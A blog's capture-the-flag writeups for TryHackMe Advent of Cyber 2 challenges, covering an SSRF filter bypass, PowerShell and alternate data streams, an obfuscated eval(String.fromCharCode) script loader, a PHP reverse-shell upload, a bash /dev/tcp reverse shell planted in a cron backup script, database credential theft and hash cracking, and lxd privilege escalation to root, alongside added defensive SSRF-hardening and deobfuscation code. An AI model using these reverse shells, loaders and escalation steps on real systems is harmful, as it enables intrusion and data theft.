poggie.de

security. code. parenting. learning. games.

TryHackMe – Advent of Cyber 2 Day 19 – 24 – BlueTeam, Web [Writeup]

As with the first, second and third parts, I have split the post so it does not get too long.

Day 19 – The Naughty or Nice List

As in the previous days, we start by deploying the AttackBox and the challenge. Once both have had some time to load, we open the site in a browser.

We have a Naughty & Nice list search and an Admin login. Let’s put something into the search, “bar” in my case.

It tells us bar is on the nice list. In the URL bar, we notice where the search query leads us:

http://10.10.154.156/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3Dbar

This is URL encoded. Using a URL decoder (for example CyberChef) we can make it read nicer:

http://10.10.154.156/?proxy=http://list.hohoho:8080/search.php?name=bar

It looks like the site requests the search result from a different server. This means we can most likely make it request other services too. It might be a Server Side Request Forgery (SSRF) vulnerability, since we control where the server sends its request.

Let’s try accessing the same server by using http://localhost as the proxy parameter: http://10.10.154.156/?proxy=http://localhost

Looks like there is a policy in place that prevents that. Other external URLs like google.com give the same error.

It seems like the host in the proxy URL has to start with list.hohoho.

The challenge hint points right at this: we can use localtest.me, a domain whose subdomains all resolve to localhost, to bypass the hostname filter. So let’s use list.hohoho.localtest.me as the proxy host.
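As an added defender’s note (not part of the original writeup): the bypass works because the filter looks at the URL string rather than at the parsed host name. The Python below contrasts such a prefix check with a hardened one and shows the design that avoids accepting a URL from the client at all. The backend address and the resolver table are constructed for the example.

```python
"""Why a prefix check on a proxy URL fails, and two safer alternatives."""
import ipaddress
from urllib.parse import urlsplit, urlencode

ALLOWED_HOST = "list.hohoho"
ALLOWED_PORTS = {8080}

# Constructed resolver table standing in for DNS so the example runs offline.
# localtest.me and its subdomains really do resolve to 127.0.0.1; the
# backend address 10.200.0.10 is made up for the example.
FAKE_DNS = {
    "list.hohoho": "10.200.0.10",
    "list.hohoho.localtest.me": "127.0.0.1",
}


def naive_is_allowed(url: str) -> bool:
    """A string prefix test, the kind of check the challenge appears to use.
    Any host that merely starts with the allowed name passes."""
    return url.startswith("http://" + ALLOWED_HOST)


def hardened_is_allowed(url: str, resolve=FAKE_DNS.get) -> bool:
    """Parse the URL, compare the host name exactly, pin the port, reject
    embedded credentials, and refuse hosts that resolve to loopback,
    link-local or unspecified addresses."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return False
    if parts.hostname != ALLOWED_HOST:        # exact match, no prefix/suffix games
        return False
    if parts.port not in ALLOWED_PORTS:
        return False
    if parts.username or parts.password:      # http://list.hohoho@evil/ tricks
        return False
    addr = resolve(parts.hostname)
    if addr is None:
        return False
    ip = ipaddress.ip_address(addr)
    return not (ip.is_loopback or ip.is_link_local or ip.is_unspecified)


def build_search_url(name: str) -> str:
    """Safest design: the client sends only the search term and the server
    builds the backend URL itself, so no URL ever comes from the request."""
    return f"http://{ALLOWED_HOST}:8080/search.php?" + urlencode({"name": name})


if __name__ == "__main__":
    bypass = "http://list.hohoho.localtest.me:8080/search.php?name=bar"
    print("naive   :", naive_is_allowed(bypass))      # True: the bypass passes
    print("hardened:", hardened_is_allowed(bypass))   # False: resolves to loopback
    print("built   :", build_search_url("bar"))
```

Even the hardened check still has to use the address it resolved for the actual connection, otherwise a DNS answer that changes between check and use (rebinding) defeats it.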

Ohh, this gives us a response:

This reveals the password, and we can use it together with the username Santa to log into the admin panel.

There we can delete the naughty list, which will display the flag.

Day 20 – PowershELlF to the rescue

As before, we deploy both the attack box and the challenge.

First we SSH into the challenge box with ssh -l mceager 10.10.104.58, accept the fingerprint and enter the supplied password.

We end up in a Windows cmd prompt. Let’s first switch to PowerShell.

With cd .\Documents\ we change into the Documents folder; tab completion helps here. ls -Hidden reveals the folder’s hidden content. With cat we can print the content of e1fone.txt.

Then we do the same for the Desktop: cd .. and cd .\Desktop\. Another ls -Hidden shows a new folder, which we enter with cd .\elf2wo\. There are no hidden files in here, so we use ls without the hidden flag to show the files, and cat again to display its content.

For the third task we are supposed to search the Windows folder, so we cd C:\Windows\System32\ into it. There are a lot of files and we need to filter them down with ls -Hidden -Directory -Filter "*3*".

After changing into the folder, we will notice it has 2 hidden files. The first one, where we are supposed to count words, is pretty long. Too long for a manual count. We can use Measure-Object for that: we cat the file and pipe it in. cat .\1.txt | Measure-Object -Word

To get specific words from the file, we can use PowerShell’s ability to index command output like an array: (cat .\1.txt)[551, 6991]

For the final question we use the Select-String cmdlet: cat .\2.txt | Select-String "redryder". And yes, I had to use the hint to realize it had to be in there as one word in lower case.

Day 21 – Time for some ELForensics

We deploy the machines and follow the guide in the challenge to connect via RDP.

After opening PowerShell, we change the directory to Documents. With ls we can check for files, then cat prints the file’s content.


Get-FileHash -Algorithm MD5 .\deebee.exe gives us the MD5 hash of that file.

Luckily we have a strings tool on the machine, so we can inspect the strings in that mysterious binary with c:\Tools\strings64.exe -accepteula .\deebee.exe and find something interesting, for example a flag.

Right below the flag we find something else:

Set-Content -Path .\lists.exe -value $(Get-Content $(Get-Command C:\Users\littlehelper\Documents\db.exe).Path -ReadCount 0 -Encoding Byte) -Encoding Byte -Stream hidedb

This hints that something is hidden in an Alternate Data Stream (ADS) of the file. Let’s display the streams of the exe:

PS C:\Users\littlehelper\Documents> Get-Item -Path .\deebee.exe -stream *


PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents\deebee.exe::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents
PSChildName   : deebee.exe::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\littlehelper\Documents\deebee.exe
Stream        : :$DATA
Length        : 5632

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents\deebee.exe:hidedb
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents
PSChildName   : deebee.exe:hidedb
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\littlehelper\Documents\deebee.exe
Stream        : hidedb
Length        : 6144

The second stream is the one we are looking for. Using the stream-related command from the description with the correct stream, we can run the DB connector: wmic process call create $(Resolve-Path .\deebee.exe:hidedb)

It will open another command window with the DB access and a flag.

Day 22 – Elf McEager becomes CyberElf

We start with the usual deploy & RDP connection dance.

For the first task, the folder name looks like it is something encoded. Opening it in CyberChef and pulling in the Magic operation, we should get the password: thegrinchwashere. There we also see which encoding was used.

We can now open up the password file. The passwords are encoded as well, so we put them into CyberChef again. Magic does the trick.

For the final flag we have to look at the recycle bin.

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 51, 44, 32, 49, 48, 53, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 51, 44, 32, 49, 48, 53, 44, 32, 49, 49, 54, 44, 32, 49, 48, 52, 44, 32, 49, 49, 55, 44, 32, 57, 56, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 52, 44, 32, 57, 55, 44, 32, 49, 48, 53, 44, 32, 49, 50, 50, 44, 32, 57, 55, 44, 32, 52, 55, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 
102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 52, 57, 44, 32, 52, 57, 44, 32, 49, 48, 48, 44, 32, 53, 49, 44, 32, 53, 48, 44, 32, 52, 57, 44, 32, 53, 48, 44, 32, 53, 50, 44, 32, 53, 50, 44, 32, 57, 57, 44, 32, 53, 50, 44, 32, 49, 48, 48, 44, 32, 53, 52, 44, 32, 53, 52, 44, 32, 53, 53, 44, 32, 53, 50, 44, 32, 53, 50, 44, 32, 53, 52, 44, 32, 49, 48, 48, 44, 32, 57, 56, 44, 32, 49, 48, 50, 44, 32, 49, 48, 48, 44, 32, 53, 55, 44, 32, 57, 55, 44, 32, 53, 49, 44, 32, 53, 48, 44, 32, 53, 55, 44, 32, 53, 54, 44, 32, 57, 55, 44, 32, 53, 54, 44, 32, 53, 54, 44, 32, 57, 56, 44, 32, 53, 54, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));

That is JavaScript, and we can put it into the web developer console of our web browser.

This gives us a github gist url we can visit to get the flag.
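Executing unknown JavaScript in a browser is not necessary to read it. As an added example (not part of the original writeup), the Python below decodes String.fromCharCode(...) layers statically, peels the eval() wrapper, decodes the next layer, and lists the URLs that appear. The sample loader, its URL and the obfuscate() helper are constructed for the example and mirror the structure of the recycle-bin script, not its content.

```python
"""Decode String.fromCharCode(...) obfuscation statically, without eval."""
import re

CALL = "String.fromCharCode("


def _call_end(src: str, open_paren: int) -> int:
    """Return the index just past the ')' matching the '(' at open_paren."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return i + 1
    raise ValueError("unbalanced parentheses in fromCharCode call")


def js_literal(text: str) -> str:
    """Wrap decoded text in a single-quoted JS string literal."""
    escaped = text.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")
    return "'" + escaped + "'"


def decode_once(src: str):
    """Replace every String.fromCharCode(n, n, ...) whose arguments are plain
    integers with the decoded literal. Returns (new_source, replacements)."""
    out, pos, count = [], 0, 0
    while True:
        idx = src.find(CALL, pos)
        if idx == -1:
            out.append(src[pos:])
            return "".join(out), count
        open_paren = idx + len(CALL) - 1
        end = _call_end(src, open_paren)
        args = src[open_paren + 1:end - 1]
        if re.fullmatch(r"\s*\d+(\s*,\s*\d+)*\s*,?\s*", args):
            out.append(src[pos:idx])
            out.append(js_literal("".join(chr(int(n)) for n in re.findall(r"\d+", args))))
            count += 1
        else:
            out.append(src[pos:end])  # non-numeric arguments: leave the call untouched
        pos = end


def unwrap_eval(src: str):
    """If the whole source is eval('<literal>'), return the literal's code."""
    m = re.fullmatch(r"\s*eval\(\s*'((?:[^'\\]|\\.)*)'\s*\)\s*;?\s*", src, re.DOTALL)
    if not m:
        return src, False
    inner = re.sub(r"\\(.)", lambda e: "\n" if e.group(1) == "n" else e.group(1), m.group(1))
    return inner, True


def deobfuscate(src: str, max_rounds: int = 10) -> str:
    """Decode in rounds: the code revealed by one eval layer may itself hold
    further fromCharCode calls, as the recycle-bin script above does."""
    for _ in range(max_rounds):
        src, replaced = decode_once(src)
        src, unwrapped = unwrap_eval(src)
        if not replaced and not unwrapped:
            break
    return src


def find_urls(src: str):
    """Pull URLs out of decoded source so the remote script it loads is visible."""
    return re.findall(r"https?://[^\s'\"<>)]+", src)


def obfuscate(code: str) -> str:
    """Build a sample in the same eval(String.fromCharCode(...)) style (constructed)."""
    return "eval(String.fromCharCode(" + ", ".join(str(ord(c)) for c in code) + "));"


# Constructed sample: a loader that injects a remote script, with the URL hidden
# one layer deeper. The URL is a placeholder, not the gist from the challenge.
SAMPLE_URL = "https://example.com/x.js"
INNER = ("var s = document.createElement('script'); s.src = String.fromCharCode("
         + ", ".join(str(ord(c)) for c in SAMPLE_URL) + "); document.head.appendChild(s);")
SAMPLE = obfuscate(INNER)
EXPECTED = ("var s = document.createElement('script'); s.src = '" + SAMPLE_URL
            + "'; document.head.appendChild(s);")

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(find_urls(deobfuscate(SAMPLE)))
```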

Day 23 – The Grinch strikes again!

And once more we deploy and log in with RDP.

There is a ransom note on our desktop. The bitcoin address seems to be encoded in some way. The two == at the end hint that it might be base64. Using a decoder like CyberChef we get the address.

Looking around in our documents folder we find a lot of files that have been renamed.

Opening up the Task Scheduler and looking at the library, we find an unusually named task, and under Actions it lists which .exe is run.

In the details of the Shadow Copy task, we find the volume ID.

The Disk Management utility shows that there is a backup partition and we can assign it a drive letter to access it.

We need to set the Explorer options to show hidden folders so we can see the hidden one.

Following the instructions of the final task, we get the last answer.

Day 24 – The Trial Before Christmas

For a final time we deploy the attack box and the challenge.

We don’t know anything about the box, so we run an nmap scan over all ports. This takes very long.

We find port 80 and 65000 open.

We bring up the site on port 65000 in the browser. The title can be found in the tab name or by looking at the source code.

Now it is time to bust out gobuster for some directory and file brute forcing. Since we waited so long for nmap, I take my chances and use only a small word list and the php extension.

root@ip-10-10-225-197:~# gobuster dir -u http://10.10.73.143:65000 -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.73.143:65000
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/12/26 04:48:03 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads.php (Status: 200)
/assets (Status: 301)
/api (Status: 301)
/grid (Status: 301)
===============================================================
2020/12/26 04:48:22 Finished
===============================================================

Pulling up http://10.10.73.143:65000/uploads.php gets us to an upload function. But even if we upload legitimate images, it gives us an Invalid File-type error.

Let’s look at the source code by pulling up the web developer tools and using the debugger. There is a filter.js, and it always returns false.

We start Burp, set the browser’s proxy to it and edit the intercept exception rule so it no longer excludes .js. Then we reload the page and forward all requests but drop the request to filter.js.

Now we copy a default PHP reverse shell: cp /usr/share/webshells/php/php-reverse-shell.php ./rs.jpg.php. We include .jpg in the filename just in case there is a server-side file type check in place. This will not fool every check, but it will fool very simple ones.

Now we edit the file to match our IP and specify a port. Then we start a netcat listener on that port with nc -lvnp 4444.

Then we turn off intercept in Burp and upload the file. Next we need to find the folder where it is stored. In our directory scan we found /grid. Pulling that up in the browser, we find our uploaded file.

After clicking it, we should have a connection on our listener. The first thing to do is to stabilize the shell. There are multiple ways of doing this, but we will follow the guide in this challenge.

python3 -c 'import pty;pty.spawn("/bin/bash")'

followed by export TERM=xterm, then CTRL+Z and stty raw -echo; fg.

With our shell stabilized, we can start to look around. whoami returns www-data, a common user for the web server. This means our permissions are most likely restricted to the web server folders.

Let’s have a look at those with cd /var/www/ and ls. There is our web.txt, which we can cat.

There is another folder, TheGrid. We cd into it and look around. It has an include sub-folder, where we find the DB credentials in dbauth.php.

Knowing the database credentials, we can connect with mysql -utron -p.

show databases; shows us the databases and use tron; selects the one we need.

show tables; displays the available tables and SELECT * FROM users; dumps the user data.

edc621628f6d19a13a00fd683f5e3ff7 looks like a hash. We can put it into a service like CrackStation to reveal the password.

After exit in mysql, su flynn with that password lets us become flynn on the shell. cd ~ takes us to the home folder, where we can cat user.txt.

Now we need to escalate our privileges. id shows us which groups flynn is in.

flynn@light-cycle:~$ id
uid=1000(flynn) gid=1000(flynn) groups=1000(flynn),109(lxd)

LXD is a container tool similar to Docker. Luckily the challenge provides a walk-through of how membership in the lxd group can be exploited.

First we check for available images.

flynn@light-cycle:~$ lxc image list
To start your first container, try: lxc launch ubuntu:18.04

+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| Alpine | a569b9af4e85 | no     | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Then we initialize the container with lxc init Alpine foo -c security.privileged=true and add a device with the host’s root filesystem: lxc config device add foo bar disk source=/ path=/mnt/root recursive=true

lxc start foo starts the container, and with lxc exec foo /bin/sh we get a shell in it.

cd /mnt/root/root gets us into the root folder, where we can cat root.txt.

That wraps up the Advent of Cyber 2 and earns us a nice certificate!

TryHackMe – Advent of Cyber 2 Day 14-18 – OSINT, Scripting, Reverse Engineering [Writeup]

As with the first and second parts, I have split the post so it does not get too long.

Day 14 – Where’s Rudolph?

I will keep this day a lot shorter and basically just give some additional hints.

For the first task we go to Reddit and open a random user’s profile. Then we replace the username in the URL with IGuidetheClaus2020. Then it is only a matter of clicking on Comments, and you have the first URL.

Read through the posts; the second one gives you the next answer.

Robert is Rudolph’s creator. Googling for “rudolph creator” will give you the third answer.

In his Reddit comments he talks about Twitter (Q4), and trying his Reddit username there, we find it is the same (Q5).

In his tweets he mentions a TV show, and that answers question 6.

For question 7 we can use Google’s reverse image search and find out about the city.

Downloading the file and looking at the EXIF data of the image will give us a location (Q8) and a flag.

Rudolph has posted an email address in his Twitter bio. Putting that into https://scylla.sh/api (a search for data breaches) as the search term email:rudolphthered@hotmail.com will give us his password.

Using the GPS EXIF data from his image in Google Maps, we find that he is staying at the Marriott in Chicago. The street number is in the hotel details.

Day 15 – There’s a Python in my stocking!

The first question of today can be answered by running True + True in the Python interpreter, and the second one can be answered by reading the day’s description.

bool("False") we can put into the interpreter again and Question 4 is another one for the Description.

For the code analysis we could just put the code into the interpreter and see what comes out. But let’s look at the code in more detail.

x = [1, 2, 3] creates a variable named x holding the list containing 1, 2 and 3.

y = x does not copy the list. Assignment in Python binds a name to an object, so y now refers to the same list as x.

y.append(6) appends 6 to the list that both y and x refer to.

print(x) prints the list, which now also contains the 6.

Day 16 – Help! Where is Santa?

Since it gives us easier access to the challenge, we are going to use the attack box again. Deploy it and the challenge.

Pulling up the page in the web browser without a port (meaning on 80) does not work, so we have to find the correct port.

A quick nmap scan should do the trick.

root@ip-10-10-226-56:~# nmap 10.10.244.23

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-23 03:55 GMT
Nmap scan report for ip-10-10-244-23.eu-west-1.compute.internal (10.10.244.23)
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
8000/tcp open  http-alt
MAC Address: 02:7D:17:61:1D:3D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

Now we can pull up the site with the browser.

The site suggests finding the link to the API with a Python script, and you should do that for practice if you haven’t done much with Python yet.

But we can also view the source and search for api.

Accessing http://10.10.244.23:8000/api/ gives us a JSON response of {"detail":"Not Found"}. We have to supply the API key. The challenge warns us that the server will block us after a certain number of wrong attempts.

It also tells us that the key is between 1 and 100 and odd, which leaves 50 different keys to try.

Let’s write a Python script to go through all potential keys:

# Import the requests library that lets us make HTTP requests
import requests

# Loop over all potential API keys. We use a step size of two because
# the description tells us the valid key is odd (1, 3, 5, ... 99).
for apikey in range(1, 100, 2):

    # Make the request and store it in response. To concatenate a string
    # (the API URL) with a number (the key) we need to convert the number
    # to a string first.
    response = requests.get('http://10.10.244.23:8000/api/' + str(apikey))

    # Print the key together with the text of the response so we can see
    # which key produced the answer.
    print(apikey, response.text)

In the console output of that script we will find the answers.

Day 17 – ReverseELFneering

First we deploy both boxes. Once they are up, we SSH into the challenge box with the provided credentials.

I highly recommend doing the example file1 walk-through provided in the challenge to get used to the tools.

We open the challenge file in radare2 with r2 -d ./challenge1 and start the analysis with aa. This will take a while.

pdf @main shows us the disassembly of the program’s main function.

In there we can already see which value is stored in local_ch first.

We can use two approaches here. The first is to go through the instructions and logically work out what should be in the variable asked for. The second is to set breakpoints, step through the instructions and then look at the memory. We will use the latter approach, even if the first would be faster in a simple program like this.

To find out what value is in eax when imul is executed, we set a breakpoint at that instruction with db 0x00400b62, then run the program up to the breakpoint with dc.

Then we step through the instructions and inspect eax with px @eax.

Stepping one instruction further, we can use px @rbp-0x4 to get the content of local_4h. We know local_4h is at rbp-0x4 from the top of main, where the local variables are listed.

Day 18 – The Bits of Christmas

We start again by deploying the attack box and the challenge. After giving it 5 minutes or so to start, follow the guide on how to connect to the Windows remote desktop. Eventually you should see the desktop.

We open TBFC_APP in ILSpy and can start browsing through the decompiled code.

Spotting the CrackMe portion, we dig further into that. It looks like this is where the form is handled. We are interested in the main form.

Let’s see what code the button runs when clicked:

Looks like there is a password check in there, and it references the correct password.

Further down is also the flag that is printed if the correct password is supplied. This already answers the questions, but we can of course also run the program, supply the password and see the flag.

TryHackMe – Advent of Cyber 2 Day 7-13 – Networking [Writeup]

Since the first post is already getting very long, I am splitting the writeup into multiple posts, grouped by topic.

You can already read the web exploitation part.

Day 7 – The Grinch Really Did Steal Christmas

For this challenge we do not need the attack box. We download the pcaps, and if we do not already have Wireshark installed, we will have to get that too.

For the first task, we open the first pcap and put icmp into the filter bar to only see ICMP packets.

To see only the HTTP GET requests, we use the filter again, this time for the HTTP GET method: http.request.method == GET

For the next question we filter for the requested IP and HTTP requests with ip.addr == 10.10.67.199 && http.request

Looking through the requests gives us a good hint of what article he was searching for.

Next we open the second pcap and use the filter once more. ftp narrows the packets down enough.

To find the encrypted protocol, we can sort by protocol and scroll through the list. That should give a quick find.

For the last task we open the third pcap. HTTP is a protocol often used for file transfer, so we filter for http.

Then we select the response and go to File -> Export Objects -> HTTP. In the next dialog we can select the .zip file.

In that zip we will find the wishlist and with it the final answer.

Day 8 – What’s Under the Christmas Tree?

For this day we are back to our beloved attack box. Deploy it and the challenge. While that is loading, spend some time googling for the first question. Wikipedia is a good source for the answer 😉

Now we scan the deployed box with nmap.

nmap 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 00:57 GMT
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3389/tcp open  ms-wbt-server
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds

The challenge wants us to experiment a bit with the -Pn, -sV and -A flags, and we do so. This should help us find the OS of the system, too.

I do like to add a -v for more verbose output to my nmap scans.

nmap -sV -v 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 01:01 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 01:01
Scanning 10.10.82.53 [1 port]
Completed ARP Ping Scan at 01:01, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:01
Completed Parallel DNS resolution of 1 host. at 01:01, 0.00s elapsed
Initiating SYN Stealth Scan at 01:01
Scanning ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53) [1000 ports]
Discovered open port 3389/tcp on 10.10.82.53
Discovered open port 80/tcp on 10.10.82.53
Discovered open port 2222/tcp on 10.10.82.53
Completed SYN Stealth Scan at 01:01, 1.25s elapsed (1000 total ports)
Initiating Service scan at 01:01
Scanning 3 services on ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Completed Service scan at 01:02, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.82.53.
Initiating NSE at 01:02
Completed NSE at 01:02, 0.01s elapsed
Initiating NSE at 01:02
Completed NSE at 01:02, 0.00s elapsed
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3389/tcp open  ms-wbt-server xrdp
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1237 (52.535KB)

For the next task, we are supposed to run the http-title script. But that script was already part of our experiment with -A.

This gives us enough information to finish the day. But there are quite a few Easter eggs hidden in this day, and you really should take the opportunity to play around a bit with nmap here.

Day 9 – Anyone can be Santa!

Today is all about FTP, so let’s get the attack box and the challenge deployed.

First we connect to the server via ftp and have a look. We don’t have credentials yet, so we go with anonymous. With ls we can list the directory’s content, just like in the terminal.

There is only one folder we can access as anonymous. We use cd to change into it, then ls again to see the content.

There are two files, and we can download them to our attack box with get filename. In our local filesystem we open up the shopping list first and answer question 3.

Now it is time to open up the script in an editor.

#!/bin/bash

# Created by ElfMcEager to backup all of Santa's goodies!

# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";

# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp

# TO-DO: Automate transfer of backups to backup server

It is a backup script that absolutely should not be in the public folder. We even have permission to upload into that folder.

We replace its content with

#!/bin/bash
bash -i >& /dev/tcp/10.10.214.41/4444 0>&1

, a simple bash reverse shell, and save the script. The IP in there needs to be your attack box IP, not the one from the challenge.

Before we upload the modified script, we need to set up a listener for our reverse shell. nc -lvnp 4444 does the trick.

Now we can upload the script with put in ftp.

After a minute or two, we should get a connection on our listener.

With cat /root/flag.txt we read our final flag.

Day 10 – Don’t be so sElfish

As always we deploy the attack box and the challenge. First we run enum4linux with -U to enumerate users.

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -U 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:41:50 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ============================== 
|    Users on 10.10.180.212    |
 ============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy    Name:   Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager    Name: elfmceagerDesc: 
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson    Name:   Desc: 

user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Sun Dec 13 09:41:51 2020

This gives us the users. Now we also enumerate the shares:

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -S 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:45:10 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
